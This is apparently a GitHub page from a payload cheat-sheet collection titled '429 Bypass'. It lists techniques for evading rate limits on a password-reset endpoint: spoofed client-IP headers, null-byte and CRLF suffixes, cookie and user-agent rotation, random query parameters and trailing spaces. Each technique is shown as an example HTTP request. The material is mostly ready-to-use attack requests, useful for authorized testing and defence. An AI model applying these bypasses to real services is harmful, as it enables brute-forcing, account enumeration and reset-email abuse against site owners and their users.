Skip to content

Latest commit

 

History

History
97 lines (65 loc) · 1.39 KB

429 Bypass.md

File metadata and controls

97 lines (65 loc) · 1.39 KB

429 Bypass (Too Many Requests)

Custom Header

# Try add custom headers
X-Forwarded-For : 127.0.0.1
X-Forwarded-Host : 127.0.0.1
X-Client-IP : 127.0.0.1
X-Remote-IP : 127.0.0.1
X-Remote-Addr : 127.0.0.1
X-Host : 127.0.0.1

# Try this to bypass
POST /ForgotPass.php HTTP/1.1
Host: target.com
X-Forwarded-For : 127.0.0.1
...

[email protected]

Adding Null Byte %00 or CRLF %09, %0d, %0a at the end of the Email can bypass rate limit

POST /ForgotPass.php HTTP/1.1
Host: target.com
...

[email protected]%00

Try changing user-agents, cookies and IP address

# Normal Request (429)
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: xxxxxxxxxx
...

[email protected]


# Try this to bypass (200)
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: aaaaaaaaaaaaa
...

[email protected]

Add a random parameter on the last endpoint

# Normal Request (429)
POST /ForgotPass.php HTTP/1.1
Host: target.com
...

[email protected]

# Try this to bypass (200)
POST /ForgotPass.php?random HTTP/1.1
Host: target.com
...

[email protected]

Add space after the parameter value

# Normal Request (429)
POST /api/forgotpass HTTP/1.1
Host: target.com
...

{"email":"[email protected]"}

# Try this to bypass (200)
POST /api/forgotpass HTTP/1.1
Host: target.com
...

{"email":"[email protected] "}